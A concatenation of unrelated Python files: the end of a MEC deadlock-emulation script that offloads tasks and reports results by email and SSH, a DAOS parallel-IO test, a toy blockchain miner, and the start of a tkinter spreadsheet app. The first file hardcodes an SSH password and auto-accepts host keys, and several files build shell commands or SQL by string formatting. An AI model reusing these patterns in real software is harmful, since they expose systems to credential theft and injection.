reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+wound-wait {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"wt{_id_}_7_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_7_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_7_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate = {cooperate} \ntask_record = {task_record}" \
f"\noutward_mec = {outward_mec}"
list_result = [
f"wt{_id_}_7_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} \noff_cloud{_id_}_7_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_7_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}",
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}",
f"\ncooperate = {cooperate} \ntask_record = {task_record} \noutward_mec = {outward_mec}"
]
file_ = open(f'{_id_}_7_{mec_no}datap.py', 'w')
for i in list_result:
file_.write(i)
file_.close()
cmd = f'mv {_id_}_7_{mec_no}datap.py {send_path}'
os.system(cmd)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
run = 1 # tell agents child when to stop
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
stop = False
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
break
print('algo stopped!')
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('send alert to control')
time.sleep(r.uniform(1, 10))
_client.publish('control/control', pickle.dumps(['stop', ip_address()]))
print('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
# (hosts_, mec_no_, cloud_ip_, send_path, broker_ip_) , (--hosts, --mec_no_, --cloud_ip, --s_path, --b_ip)
parser = argparse.ArgumentParser()
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
parser.add_argument('--mec_no', type=int, default=1.0, help='Number of MEC nodes')
parser.add_argument('--cloud_ip', type=str, help="cloud ip address")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
parser.add_argument('--b_ip', type=str, help='Broker ip address')
args = parser.parse_args()
h_hosts = ast.literal_eval(args.hosts)
run_me(hosts_=h_hosts, mec_no_=args.mec_no, cloud_ip_=args.cloud_ip, send_path=args.s_path, broker_ip_=args.b_ip)
if __name__ == '__main__':
main()
|
parallel_io.py
|
#!/usr/bin/python
"""
(C) Copyright 2020 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Government's rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
"""
import threading
import subprocess
import time
from getpass import getuser
import general_utils
from ClusterShell.NodeSet import NodeSet
from command_utils import CommandFailure
from daos_utils import DaosCommand
from test_utils_pool import TestPool
from test_utils_container import TestContainer
from dfuse_utils import Dfuse
from fio_test_base import FioBase
from ior_test_base import IorTestBase
# pylint: disable=too-many-ancestors
class ParallelIo(FioBase, IorTestBase):
"""Base Parallel IO test class.
:avocado: recursive
"""
def __init__(self, *args, **kwargs):
"""Initialize a ParallelIo object."""
super(ParallelIo, self).__init__(*args, **kwargs)
self.dfuse = None
self.cont_count = None
self.pool_count = None
self.statvfs_info_initial = None
self.statvfs_before_cont_destroy = None
self.statvfs_after_cont_destroy = None
self.pool = []
self.container = []
def setUp(self):
"""Set up each test case."""
# Start the servers and agents
super(ParallelIo, self).setUp()
def tearDown(self):
"""Tear down each test case."""
try:
if self.dfuse:
self.dfuse.stop()
finally:
# Stop the servers and agents
super(ParallelIo, self).tearDown()
def create_pool(self):
"""Create a TestPool object to use with ior."""
# Get the pool params
pool = TestPool(
self.context, dmg_command=self.get_dmg_command())
pool.get_params(self)
# Create a pool
pool.create()
self.pool.append(pool)
# pylint: disable=arguments-differ
def create_cont(self, pool):
"""Create a TestContainer object to be used to create container.
Args:
pool (TestPool): TestPool object type for which container
needs to be created
"""
# Get container params
container = TestContainer(
pool, daos_command=DaosCommand(self.bin))
container.get_params(self)
# create container
container.create()
self.container.append(container)
def start_dfuse(self, pool=None):
"""Create a DfuseCommand object to start dfuse.
Args:
pool (TestPool): Test pool object if dfuse is intended to be
started using pool uuid option.
"""
# Get Dfuse params
self.dfuse = Dfuse(self.hostlist_clients, self.tmp)
self.dfuse.get_params(self)
# update dfuse params
if pool:
self.dfuse.set_dfuse_params(pool)
self.dfuse.set_dfuse_exports(self.server_managers[0], self.client_log)
try:
# start dfuse
self.dfuse.run()
except CommandFailure as error:
self.log.error("Dfuse command %s failed on hosts %s",
str(self.dfuse),
self.dfuse.hosts,
exc_info=error)
self.fail("Test was expected to pass but it failed.\n")
def stat_bfree(self, path):
"""Get stat bfree
Args:
path (str): path to get free block size of.
Returns:
integer value of stat free blocks
"""
cmd = ["ssh", "{}@{}".format(getuser(), self.hostlist_clients[0]),
"stat -c%a -f {}".format(path)]
try:
result = subprocess.check_output(cmd)
except subprocess.CalledProcessError as err:
self.fail("Get free block size method failed with: {}".format(err))
return int(result)
def statvfs_pool(self, path):
"""Method to obtain free space using statvfs
Args:
path (str): path for which free space needs to be obtained for.
Returns:
List containing free space info for each pool supplied in pool_obj.
"""
statvfs_list = []
for _, pool in enumerate(self.pool):
dfuse_pool_dir = str(path + "/" + pool.uuid)
statvfs_info = self.stat_bfree(dfuse_pool_dir)
statvfs_list.append(statvfs_info)
self.log.info("Statvfs List Output: %s", statvfs_list)
return statvfs_list
def verify_aggregation(self, reduced_space, count):
"""Verify if expected space is returned for each pool after containers
were destroyed. If not, wait for 60 secs and check again. Wait 4
times, otherwise exit the test with a failure.
Args:
reduced_space: expected space to be returned
"""
counter = 1
while (self.statvfs_after_cont_destroy[count] <
self.statvfs_before_cont_destroy[count] + reduced_space):
# try to wait for 4 x 60 secs for aggregation to be completed
# or else exit the test with a failure.
if counter > 4:
self.log.info("Free space before io: %s",
self.statvfs_info_initial)
self.log.info("Free space after io: %s",
self.statvfs_before_cont_destroy)
self.log.info("Free space at test termination: %s",
self.statvfs_after_cont_destroy)
self.fail("Aggregation did not complete as expected")
time.sleep(60)
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
counter += 1
def test_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to mount dfuse and verify multiple
containers using fio.
Use cases:
Mount dfuse using pool uuid.
Create multiple containers under that dfuse mount point.
Check those containers are accessible from that mount point.
Perform io to those containers using FIO
Delete one of the containers
Check if dfuse is still running. If not, fail the test and exit.
Otherwise, try accessing the deleted container.
This should fail.
Check dfuse again.
:avocado: tags=all,hw,daosio,medium,ib2,full_regression,parallelio
"""
# get test params for cont and pool count
self.cont_count = self.params.get("cont_count", '/run/container/*')
threads = []
# Create a pool and start dfuse.
self.create_pool()
self.start_dfuse(self.pool[0])
# create multiple containers
for _ in range(self.cont_count):
self.create_cont(self.pool[0])
# check if all the created containers can be accessed and perform
# io on each container using fio in parallel
for _, cont in enumerate(self.container):
dfuse_cont_dir = self.dfuse.mount_dir.value + "/" + cont.uuid
cmd = u"ls -a {}".format(dfuse_cont_dir)
try:
# execute bash cmds
ret_code = general_utils.pcmd(
self.hostlist_clients, cmd, timeout=30)
if 0 not in ret_code:
error_hosts = NodeSet(
",".join(
[str(node_set) for code, node_set in
ret_code.items() if code != 0]))
raise CommandFailure(
"Error running '{}' on the following "
"hosts: {}".format(cmd, error_hosts))
# report error if any command fails
except CommandFailure as error:
self.log.error("ParallelIo Test Failed: %s",
str(error))
self.fail("Test was expected to pass but "
"it failed.\n")
# run fio on all containers
thread = threading.Thread(target=self.execute_fio, args=(
self.dfuse.mount_dir.value + "/" + cont.uuid, False))
threads.append(thread)
thread.start()
# wait for all fio jobs to be finished
for job in threads:
job.join()
# destroy first container
container_to_destroy = self.container[0].uuid
self.container[0].destroy(1)
# check dfuse if it is running fine
self.dfuse.check_running()
# try accessing destroyed container, it should fail
try:
self.execute_fio(self.dfuse.mount_dir.value + "/" + \
container_to_destroy, False)
self.fail("Fio was able to access destroyed container: {}".\
format(self.container[0].uuid))
except CommandFailure as error:
self.log.info("This run is expected to fail")
# check dfuse is still running after attempting to access deleted
# container.
self.dfuse.check_running()
def test_multipool_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to verify aggregation across multiple
pools and containers.
Use cases:
Create 10 pools
Create 10 containers under each pool.
Record statvfs free space for each pool.
Perform parallel io to each pool without deleting the file
after write.
Record free space using statvfs after write.
Delete half of the containers from each pool.
Calculate the expected amount of data to be deleted when
containers are destroyed.
Record free space after container destroy.
Loop until either the all space is returned back after aggregation
completion or exit the loop after trying for 240 secs of wait and
fail the test.
:avocado: tags=all,hw,daosio,medium,ib2,full_regression
:avocado: tags=multipoolparallelio
"""
# test params
threads = []
pool_threads = []
cont_threads = []
self.pool_count = self.params.get("pool_count", '/run/pool/*')
self.cont_count = self.params.get("cont_count", '/run/container/*')
processes = self.params.get("np", '/run/ior/client_processes/*')
# Create pools in parallel.
for _ in range(self.pool_count):
pool_thread = threading.Thread(target=self.create_pool())
pool_threads.append(pool_thread)
pool_thread.start()
# wait for container create to finish
for pool_job in pool_threads:
pool_job.join()
# start dfuse using --svc option only.
self.start_dfuse()
# record free space using statvfs before any data is written.
self.statvfs_info_initial = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Create 10 containers for each pool. Container create process cannot
# be parallelised as different container create could complete at
# different times and get appended in the self.container variable in
# unorderly manner, causing problems during the write process.
for _, pool in enumerate(self.pool):
for _ in range(self.cont_count):
self.create_cont(pool)
# Try to access each dfuse mounted container using ls. Once it is
# accessed successfully, go ahead and perform io on that location
# using ior. This process of performing io is done in parallel for
# all containers using threads.
for pool_count, pool in enumerate(self.pool):
dfuse_pool_dir = str(self.dfuse.mount_dir.value + "/" + pool.uuid)
for counter in range(self.cont_count):
cont_num = (pool_count * self.cont_count) + counter
dfuse_cont_dir = str(dfuse_pool_dir + "/" +
self.container[cont_num].uuid)
cmd = u"###ls -a {}".format(dfuse_cont_dir)
self.execute_cmd(cmd)
# run ior on all containers
test_file = dfuse_cont_dir + "/testfile"
self.ior_cmd.test_file.update(test_file)
self.ior_cmd.set_daos_params(
self.server_group, pool, self.container[cont_num].uuid)
thread = threading.Thread(
target=self.run_ior,
args=(self.get_ior_job_manager_command(), processes, None,
False))
threads.append(thread)
thread.start()
# wait for all ior jobs to be finished
for job in threads:
job.join()
# Record free space after io
self.statvfs_before_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Destroy half of the containers from each pool
pfinal = 0
for count in range(self.cont_count):
pinitial = pfinal
pfinal = pinitial + (self.cont_count // 2)
del self.container[pinitial:pfinal]
for cont in self.container:
cont_thread = threading.Thread(target=cont.destroy)
cont_threads.append(cont_thread)
cont_thread.start()
for destroy_job in cont_threads:
destroy_job.join()
# Record free space after container destroy.
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Calculate the expected space to be returned after containers
# are destroyed.
reduced_space = (self.cont_count *
int(self.ior_cmd.block_size.value))/2
# Verify if expected space is returned for each pool after containers
# were destroyed. If not, wait for 60 secs and check again. Wait 4
# times, otherwise exit the test with a failure.
for count in range(self.pool_count):
thread = threading.Thread(
target=self.verify_aggregation,
args=(reduced_space, count))
threads.append(thread)
thread.start()
for job in threads:
job.join()
|
miner.py
|
import time
import threading
from .. import blockchain
from ..wallet.address import Address
from ..util.hash import sha256d
REWARD = 5
DIFFICULTY = 2 ** (256 - 21)
class Miner(object):
def __init__(self, address=None):
self.__interrupt = False
self.__found = False
self.__shutdown = False
self.__address = None
self.current_block = None
if self.__address is None:
self.__address = Address()
# print(self.__address.public_key)
# print(self.__address.private_key)
self.main_thread = threading.Thread( target = self.main_loop, args = [] )
def __debug(self, msg):
print(msg)
@property
def found(self):
return self.__found
def shutdown(self):
"""
"""
self.__shutdown = True
def interrupt(self):
"""
"""
self.__debug('------- INCOMING BLOCK --------')
self.__interrupt = True
def begin_mining(self):
"""
"""
self.__interrupt = False
def get_current_block(self):
if self.current_block:
return self.current_block.serialize()
return None
def create_current_block(self, transactions):
"""
"""
for tx in transactions:
if tx.is_coinbase:
transactions.remove(tx)
max_height = blockchain.BlockChain().get_height()
prev_block = blockchain.BlockChain().get_block_height(max_height)
fees = 0
for tx in transactions:
fees += tx.miner_fee
coin_base_output = {
'amount': REWARD + fees,
'public_key_owner': self.__address.public_key,
'unspent': 1,
}
coin_base_transaction_data = {
'hash': '',
'block_hash': '',
'num_inputs': 0,
'num_outputs': 1,
'timestamp': time.time(),
'is_coinbase': 1,
'is_orphan': 0,
'tx_inputs': [],
'tx_outputs': [coin_base_output],
}
coin_base_transaction = blockchain.transaction.Transaction(**coin_base_transaction_data)
transactions.append(coin_base_transaction)
block_data = {
'hash': '',
'timestamp': time.time(),
'nonce': '',
'num_transactions': len(transactions),
'is_orphan': 0,
'previous_block_hash': prev_block.hash,
'height': int(max_height) + 1,
'transactions': transactions,
}
new_block = blockchain.block.Block(**block_data)
self.current_block = new_block
return new_block
def start(self):
self.__debug('------ BEGIN MINING --------')
self.main_thread.start()
def main_loop(self):
"""
"""
while not self.__shutdown:
nonce = 0
while self.current_block is None:
pass
self.__debug('------- BEGIN MINING BLOCK --------')
block = self.current_block
while(not self.__interrupt and not self.__found):
block.nonce = nonce
block.hash = block.valid_hash()
if int(block.hash, 16) < DIFFICULTY:
self.__found = True
break
nonce += 1
if self.__found and not self.__interrupt:
self.__debug('------- BLOCK FOUND --------')
self.__interrupt = True
self.__debug('------- INTERRUPTED --------')
while(self.__interrupt):
pass
self.current_block = None
|
F-box.py
|
from tkinter import *
from tkinter.tix import *
#import pyvips
from PIL import Image, ImageTk
from idlelib.tooltip import Hovertip
from tkinter import font
import ctypes
import win32con
from multiprocessing import Process,freeze_support,pool
from multiprocessing.dummy import Pool as ThreadPool
import threading
from time import sleep
from os import path
import sys
import os.path
#from win32api import GetSystemMetrics
import sqlite3
import pickle
from tkinter import ttk
from tkinter.messagebox import showerror
from tkinter.messagebox import showwarning
from tkinter.messagebox import askokcancel
from tkinter.messagebox import askyesno
from winsound import *
from tkinter.filedialog import askopenfilename
import tkinter as tk
from matplotlib.figure import Figure
from matplotlib import pyplot as plt
from matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg,NavigationToolbar2Tk)
from tkinter import colorchooser
ctypes.windll.shcore.SetProcessDpiAwareness(2)
root=Tk()
sys.setrecursionlimit(20000)
#f-analysis class frame
class Financial:
def __init__(self,main):
myframe=Frame()
self.myframe=myframe
self.photo=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\Untitled-1FRE-Temp0001.pn.png")
self.photo=self.photo.resize((round(root.winfo_screenwidth()/2.4),round(root.winfo_screenheight()/5.4)))
self.show=ImageTk.PhotoImage(self.photo)
self.showit=Label(root,image=self.show,bd=0,borderwidth=0)
#condition whereby check buttons file for the themes is not created it creates one automatically
if path.exists('check.pkl')==False:
data=0
with open('check.pkl', 'wb') as f1:
self.data=pickle.dump(data,f1)
f1.close()
with open('check.pkl','rb') as f1:
self.data=pickle.load(f1)
#condition whereby template file not created it creates one automatically
if path.exists('loader.pk')==False:
data2='Main'
with open('loader.pk', 'wb') as f2:
self.data3=pickle.dump(data2,f2)
f2.close()
with open('loader.pk','rb') as f2:
self.data3=pickle.load(f2)
# condition whereby the check button exists and it's size is greater than 0
if path.exists('check.pkl')==True and os.path.getsize('check.pkl')>0:
with open('check.pkl','rb') as f1:
self.data=pickle.load(f1)
# condition whereby the template exists and it's size is greater than 0
if path.exists('loader.pk')==True and os.path.getsize('loader.pk')>0:
with open('loader.pk','rb') as f2:
self.data3=pickle.load(f2)
if path.exists('data.db')==False:
data=sqlite3.connect('data.db')
connet=data.cursor()
connet.execute("CREATE TABLE data(cells TEXT,row1 TEXT,row2 TEXT,row3 TEXT,row4 TEXT,row5 TEXT,row6 TEXT,row7 TEXT,row8 text)")
data.commit()
data.close()
if path.exists('data.db')==True:
if path.exists('loader.pk')==True and os.path.getsize('loader.pk')>0:
with open('loader.pk','rb') as f2:
self.data3=pickle.load(f2)
print(self.data3)
data=sqlite3.connect('data.db')
connet=data.cursor()
self.names=connet.execute("SELECT cells FROM {}".format(self.data3)).fetchall()
self.play=connet.execute('SELECT rowid FROM {}'.format(self.data3)).fetchall()
data.commit()
data.close()
# print(main.label.cget('text'))
self.top=Toplevel(root)
#self.top.geometry('{}x{}+0+0'.format(self.top.winfo_screenwidth(),self.top.winfo_screenheight()))
self.top.withdraw()
def get(self):
self.top.deiconify()
self.width=self.top.winfo_screenwidth()
self.height=self.top.winfo_screenheight()
root.withdraw()
#self.top=self.top
self.top.bind('<Alt-F4>',self.close)
self.v=IntVar()
self.v.set(round(0.00625*self.width))
self.top.geometry('{}x{}+0+1'.format(self.width,self.height))
#self.top.protocol('WM_DELETE_WINDOW',second.close)
self.top.bind('<Configure>',self.master_update)
my_menu=Menu(self.top,background='black',activebackground='black',foreground='white',bg='black',borderwidth=0,bd=0)
self.g='200x200+0+0'
#self.top.wm_attributes('-type','splash')
self.top.overrideredirect(True)
#self.top.state('zoomed')
photos1=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\bar.png")
photos1=ImageTk.PhotoImage(photos1)
photos2=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\scatter.png")
photos2=ImageTk.PhotoImage(photos2)
photos3=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\basic.png")
photos3=ImageTk.PhotoImage(photos3)
photos4=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\rank.png")
photos4=ImageTk.PhotoImage(photos4)
photos5=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\max.png")
photos5=ImageTk.PhotoImage(photos5)
self.nam=['1']*50
self.j2=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\suunday.png")
self.j2=ImageTk.PhotoImage(self.j2)
self.top.wm_title('Financial Analysis')
self.top.config(bg='white')
self.top.iconphoto(False,self.j2)
#Main canvas that contains the spreadsheet widgets
self.c = Canvas(self.top,borderwidth=0,width=self.width//1.1925465839,
height=self.height//1.2705882353,bg='#EBEBE6',highlightthickness=0)
#canvas that contains columns names
self.c3=Canvas(self.top,bg='black',width=self.width//1.1925465839,
height=self.height//36,bd=0,borderwidth=0,highlightthickness=0)
#canvas that contains the cell row names label
self.c4=Canvas(self.top,bg='black',width=self.width//6.7605633803,
height=self.width//36,bd=0,borderwidth=0,highlightthickness=0)
#canvas that contains that contains the menu bar1
self.toolbar=Canvas(self.top,width=self.width//1.1925465839,
height=0.05*self.height,bg='white',bd=0,borderwidth=0,highlightthickness=0)
#canvas that contains the menubars 2
self.toolbar2=Canvas(self.top,width=self.width//6.7605633803,
height=0.05*self.height,bg='white',bd=0,borderwidth=0,highlightthickness=0)
self.c41=self.c4.create_text(round(self.width/13.24),round(self.height/72),text='Cells Names',font=('Helvatica',self.v.get(),'bold'),fill='red')
#container frame for the main csnvas
self.f2=Frame(self.c,bg='#EBEBE6')
#canvas that contains the row names i.e cell row names
self.c2=Canvas(self.top,bg='#EBEBE6',width=self.width//6.7605633803,
height=self.height//1.2705882353,borderwidth=0,highlightthickness=0,bd=0)
self.top.bind('<Up>',self.up)
self.top.bind('<Down>',self.down)
self.top.bind('<Right>',self.right)
self.top.bind('<Left>',self.left)
#frame that contains the cell row names i.e cell row names
self.f3=Frame(self.c2,bg='#EBEBE6')
#canvas that contains the ent and bu widgets for auto-calculation
self.testf=Canvas(self.top,borderwidth=0,width=self.width//1.1925465839,
height=self.height//7.397260274,bg='white',highlightthickness=0)
#frame that contains the canvas that holds the ent and bu widgets
self.test9=Frame(self.testf)
#canvas that hold the configure button and back button
self.testy=Canvas(self.top,borderwidth=0,width=round(self.width//6.7605633803),
height=round(self.height//7.397260274),bg='white',highlightthickness=0)
#frames that contains the canvas which holds the config butt and back butt
self.test10=Frame(self.testy,bg='white')
print(root.winfo_screenwidth())
self.barframe=Canvas(self.top,bg='white',width=round(self.width//6.1935483871),
height=round(self.height//7.397260274),bd=-2,highlightthickness=0,borderwidth=0)
self.barframe2=Frame(self.barframe,bg='white')
#barframe3=Canvas(barframe2,bg='blue',width=310,height=0.05*self.top.winfo_screenheight())
self.sc1=Scrollbar(self.top,orient='vertical',command=self.scroll,bg='black')
self.sc=Scrollbar(self.test10,orient='horizontal',command=self.scroll1)
self.f4=Frame(self.c3,bg='#EBEBE6')
self.f6=Frame(self.toolbar2,bg='white')
self.f7=Frame(self.toolbar,bg='white')
menu1=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\print.png")
menu1=menu1.resize((int(self.width//42.666666667),int(self.height//27)))
menu1=ImageTk.PhotoImage(menu1)
menu2=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\pdf.png")
menu2=menu2.resize((int(self.width//48),int(self.height//27)))
menu2=ImageTk.PhotoImage(menu2)
menu3=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\Excel.png")
menu3=menu3.resize((int(self.width//38.4),int(self.height//25.11627907)))
menu3=ImageTk.PhotoImage(menu3)
self.one=Menubutton(self.f6,text='Create New Template',font=('Time',self.v.get()-1),bg='white',fg='black',activebackground='grey',activeforeground='white',
height=3,width=17,bd=-2,borderwidth=-2,highlightthickness=0)
self.two=Menubutton(self.f7,text='Menu',font=('Time',self.v.get()-1),bg='white',fg='black',activebackground='grey',activeforeground='white',
height=3,bd=-2,borderwidth=-2,highlightthickness=0)
self.three=Menubutton(self.f7,text='Edit',font=('Time',self.v.get()-1),bg='white',fg='black',activebackground='grey',activeforeground='white',
height=3,width=4,bd=-2,borderwidth=-2,highlightthickness=0)
self.four=Menubutton(self.f7,text='Graph',font=('Time',self.v.get()-1),bg='white',fg='black',activebackground='grey',activeforeground='white',
height=3,width=4,bd=-2,borderwidth=-2,highlightthickness=0)
self.five=Menubutton(self.f7,text='Functions',font=('Time',self.v.get()-1),bg='white',fg='black',activebackground='grey',activeforeground='white',
height=3,width=7,bd=-2,borderwidth=-2,highlightthickness=0)
self.six=Button(self.f7,image=menu1,bg='black',activebackground='grey',bd=0,borderwidth=0)
self.six.menu1=menu1
self.seven=Button(self.f7,image=menu2,bg='black',activebackground='grey',bd=0,borderwidth=0)
self.seven.menu2=menu2
hov2=Hovertip(self.seven,'Convert To PDF Format',hover_delay=500)
self.eight=Button(self.f7,image=menu3,bg='black',activebackground='grey',bd=0,borderwidth=0)
self.eight.menu3=menu3
hov2=Hovertip(self.eight,'Convert To Excel Format',hover_delay=500)
self.template=Label(self.f7,text=self.data3)
self.top.bind('<ButtonPress-1>',self.tryer1)
self.ted=Menu(self.one,tearoff=0,activebackground='white',activeforeground='black',bg='black',fg='white',activeborderwidth=0,bd=-2,borderwidth=0)
self.ted1=Menu(self.two,tearoff=0,activebackground='white',activeforeground='black',bg='black',fg='white',activeborderwidth=0)
self.ted2=Menu(self.three,tearoff=0,activebackground='white',activeforeground='black',bg='black',fg='white',activeborderwidth=0)
self.ted3=Menu(self.four,tearoff=0,activebackground='white',activeforeground='black',bg='black',fg='white',activeborderwidth=0)
self.ted4=Menu(self.five,tearoff=0,activebackground='white',activeforeground='black',bg='black',fg='white',activeborderwidth=0,bd=0)
self.one['menu']=self.ted
self.two['menu']=self.ted1
self.three['menu']=self.ted2
self.four['menu']=self.ted3
self.five['menu']=self.ted4
self.two.grid(row=0,column=0,sticky='w',padx=8)
self.one.grid(row=0,column=0,sticky='w',padx=8)
self.three.grid(row=0,column=1,sticky='w')
self.four.grid(row=0,column=2,sticky='w',padx=8)
self.five.grid(row=0,column=3,sticky='w',padx=8)
self.six.grid(row=0,column=4,sticky='w',padx=8)
hov1=Hovertip(self.six,'Print File',hover_delay=500)
self.seven.grid(row=0,column=5,sticky='w',padx=8)
self.eight.grid(row=0,column=6,sticky='w',padx=8)
self.template.grid(row=0,column=10,sticky='w',)
self.ted.add_command(label='Create',command=self.create)
self.ted.add_command(label='Load',command=self.load)
self.ted.add_command(label='Edit')
self.ted.add_command(label='Delete')
self.ted1.add_command(label='Open')
self.ted1.add_command(label='Open As')
self.ted1.add_command(label='Save')
self.ted1.add_command(label='Save As')
self.ted1.add_command(label='Save As')
self.ted1.add_command(label='Print')
self.ted1.add_command(label='Open Recent')
self.ted1.add_command(label='Options')
self.ted1.add_command(label='Exit')
self.ted3.add_command(label='Basic Graph',image=photos3,compound='left',command=self.graph)
self.ted3.photos3=photos3
self.ted3.add_command(label='Scatter Graph',image=photos2,compound='left',command=self.graph2)
self.ted3.photos2=photos2
self.ted3.add_command(label='Bar Graph',image=photos1,compound='left',command=self.graph3)
self.ted3.photos1=photos1
self.ted4.add_command(label='Sum',command=self.sum)
self.ted4.add_command(label='Average',command=self.average)
self.ted4.add_command(label='Rank',image=photos4,compound='left',command=self.rank)
